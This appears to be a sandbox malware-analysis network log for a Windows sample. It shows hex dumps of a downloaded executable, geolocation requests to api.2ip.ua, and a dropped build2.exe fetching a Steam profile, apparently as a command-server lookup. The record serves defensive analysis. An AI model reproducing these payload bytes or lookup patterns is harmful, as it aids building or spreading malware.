3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>|@.rsrc/>0~@@
                                                                                                                                      Apr 24, 2024 14:42:14.818842888 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00 00 00 00 00 f6 6b 03 00 0c 6c 03 00 22 6c 03 00 2e 6c 03 00 48 6c 03 00 5a 6c 03 00 70 6c 03 00 86 6c 03 00 96 6c 03 00 ac 6c 03 00 c0 6c 03 00 d0 6c 03 00 ec
                                                                                                                                      Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnnnoo,o@oTo`opoookooo
                                                                                                                                      Apr 24, 2024 14:42:14.818941116 CEST1289INData Raw: 53 00 6f 00 6c 00 6f 00 66 00 75 00 64 00 69 00 20 00 67 00 6f 00 78 00 6f 00 72 00 75 00 76 00 20 00 73 00 61 00 70 00 6f 00 63 00 75 00 7a 00 69 00 00 00 4e 00 69 00 6d 00 69 00 67 00 6f 00 74 00 20 00 67 00 69 00 66 00 6f 00 76 00 75 00 00 00
                                                                                                                                      Data Ascii: Solofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefejexe
                                                                                                                                      Apr 24, 2024 14:42:14.819032907 CEST1289INData Raw: 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 20 00 3e 00 20 00 3e 00 3a 00 3a 00 6f 00 70 00 65 00 72 00 61 00 74
                                                                                                                                      Data Ascii: ,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual Stud
                                                                                                                                      Apr 24, 2024 14:42:15.020574093 CEST1289INData Raw: 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 62 00 61 00 73 00 69 00 63 00 5f 00 73 00 74 00 72 00 69 00 6e 00 67 00 3c 00 63 00 68 00 61 00 72 00 2c 00 73 00 74 00 72 00 75 00 63 00 74 00
                                                                                                                                      Data Ascii: cator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Vector_const_iterator
                                                                                                                                      Apr 24, 2024 14:42:15.020700932 CEST1289INData Raw: 00 00 00 00 00 73 00 72 00 63 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74
                                                                                                                                      Data Ascii: src != NULLmemcpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.cdst != NULLmemmove_sf:\dd\vctools\crt_bld\sel
                                                                                                                                      Apr 24, 2024 14:42:15.020714998 CEST1289INData Raw: 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 28 00
                                                                                                                                      Data Ascii: C++ documentation on asserts.memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot
                                                                                                                                      Apr 24, 2024 14:42:15.020768881 CEST1289INData Raw: 00 55 00 4c 00 4c 00 29 00 00 00 70 00 75 00 74 00 63 00 00 00 00 00 76 00 73 00 63 00 61 00 6e 00 66 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c
                                                                                                                                      Data Ascii: ULL)putcvscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)f:\dd\vctools\crt_bld\self_x86\crt\src\_file.cf:\dd\vctools\crt_bld\se
                                                                                                                                      Apr 24, 2024 14:42:15.020812988 CEST1289INData Raw: 72 65 61 6c 6c 6f 63 28 29 00 00 00 00 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 79 70 65 2e 0a 0a 4d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 65 64 20 61
                                                                                                                                      Data Ascii: realloc()Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).Client hook re-allocation failure.Client hook re-allocation failure at file %hs
                                                                                                                                      Apr 24, 2024 14:42:15.020867109 CEST1289INData Raw: 20 66 72 65 65 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00 00 54 68 65 20 42 6c 6f 63 6b 20 61 74 20 30 78 25 70 20 77 61 73 20 61 6c 6c 6f 63 61 74 65 64 20 62 79 20 61 6c 69 67 6e 65 64 20 72 6f 75 74 69 6e 65 73 2c 20 75 73 65 20 5f 61 6c 69
                                                                                                                                      Data Ascii: free failure.The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long.%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).HEAP C
                                                                                                                                      Apr 24, 2024 14:42:15.020915031 CEST1289INData Raw: 61 00 74 00 65 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 4f 62 6a 65 63 74 20 64 75 6d 70 20 63 6f 6d 70 6c 65 74 65 2e 0a 00 00 63 72 74 20 62 6c 6f 63 6b 20 61 74 20 30 78 25 70 2c 20 73 75 62 74 79 70 65 20 25 78 2c 20 25 49 75
                                                                                                                                      Data Ascii: ate != NULLObject dump complete.crt block at 0x%p, subtype %x, %Iu bytes long.normal block at 0x%p, %Iu bytes long.client block at 0x%p, subtype %x, %Iu bytes long.{%ld} %hs(%d) : #File Error#(%d) : Dumping objects


                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.749699104.21.65.244436692C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:03 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: api.2ip.ua
                                                                                                                                      2024-04-24 12:42:04 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:04 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s7ZYkHVoR5prlzZ71WW8J6s6YLr8rEgSMxf1SAazqId0wG8FAN0AGMgwfbVnkc0RATwtt7Mu7TwXY30gJn0aIAem5DOk9eRG%2FA6myvB%2BA147Hzgz%2FW%2Baa29trVn9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 87962bcc5c917e88-LAX
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 12:42:04 UTC455INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 61 66 63 37 63 61 63 33 64 66 65 66 39 64 63 36 64 66 38 31 63 32 63 61 39 30 64 63 64 61 63 64 63 35 63 61 63 63
                                                                                                                                      Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#afc7cac3dfef9dc6df81c2ca90dcdacdc5cacc
                                                                                                                                      2024-04-24 12:42:04 UTC475INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 33 63 35 34 35 39 35 30 34 63 37 63 30 65 35 35 34 63 31 32 34 39 35 64 30 33 34 66 34 39 35 65 35 36 35 39 35 66 34 38 30 31 30 65 35 35 34 63 31 32 34 39 35 64
                                                                                                                                      Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#3c5459504c7c0e554c12495d034f495e56595f48010e554c12495d
                                                                                                                                      2024-04-24 12:42:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.749700104.21.65.244435784C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:05 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: api.2ip.ua
                                                                                                                                      2024-04-24 12:42:06 UTC912INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:06 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i5dWEaOC9Nq1ZEZreWDaqJtjNp86SWZCgJYrMA%2F6WIe4brwCRpZUuIEPA3%2FfIx70AQvxKNZbRynopjY4TCeJclMmezq4spNETDzt6AFvHuMW7tIL7vqYHkY7QkL%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 87962bdb4ee03173-LAX
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 12:42:06 UTC457INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 31 32 37 61 37 37 37 65 36 32 35 32 32 30 37 62 36 32 33 63 37 66 37 37 32 64 36 31 36 37 37 30 37 38 37 37 37 31
                                                                                                                                      Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#127a777e6252207b623c7f772d616770787771
                                                                                                                                      2024-04-24 12:42:06 UTC473INData Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 36 66 30 37 30 61 30 33 31 66 32 66 35 64 30 36 31 66 34 31 31 61 30 65 35 30 31 63 31 61 30 64 30 35 30 61 30 63 31 62 35 32 35 64 30 36 31 66 34 31 31 61 30 65 22 3e
                                                                                                                                      Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#6f070a031f2f5d061f411a0e501c1a0d050a0c1b525d061f411a0e">
                                                                                                                                      2024-04-24 12:42:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.749701104.21.65.244436348C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:06 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: api.2ip.ua
                                                                                                                                      2024-04-24 12:42:07 UTC908INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:07 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YYYFb2bJZS2pb5wxkCuzkDRbcNAxukxuZgQj8ky0U%2FkqHCXeYkG796jNmavUK6KqQLwscl52ElH4s8lSFCGQAFpYHuSZJjIPLBhiQ662ItcdHhTW4NzlIWKqUYs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 87962bdf797b2ebd-LAX
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 12:42:07 UTC461INData Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 37 33 31 62 31 36 31 66 30 33 33 33 34 31 31 61 30 33 35 64 31 65 31 36 34 63 30 30 30 36 31 31 31 39 31 36 31 30
                                                                                                                                      Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#731b161f0333411a035d1e164c000611191610
                                                                                                                                      2024-04-24 12:42:07 UTC361INData Raw: d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 30 35 36 64 36 30 36 39 37 35 34 35 33 37 36 63 37 35 32 62 37 30 36 34 33 61 37 36 37 30 36 37 36 66 36 30 36 36 37 31 33 38 33 37 36 63 37 35 32 62 37 30 36 34 22 3e 3c 73 70 61
                                                                                                                                      Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#056d60697545376c752b70643a7670676f60667138376c752b7064"><spa
                                                                                                                                      2024-04-24 12:42:07 UTC114INData Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                      Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
                                                                                                                                      2024-04-24 12:42:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.74970623.65.44.844437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:14 UTC119OUTGET /profiles/76561199673019888 HTTP/1.1
                                                                                                                                      Host: steamcommunity.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:15 UTC1870INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:15 GMT
                                                                                                                                      Content-Length: 33790
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: sessionid=9ceae89e4ed8568969dc3c36; Path=/; Secure; SameSite=None
                                                                                                                                      Set-Cookie: steamCountry=US%7C8efca4b9dedd65f9ac922759639cacad; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                      2024-04-24 12:42:15 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                      2024-04-24 12:42:15 UTC10062INData Raw: 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                      Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
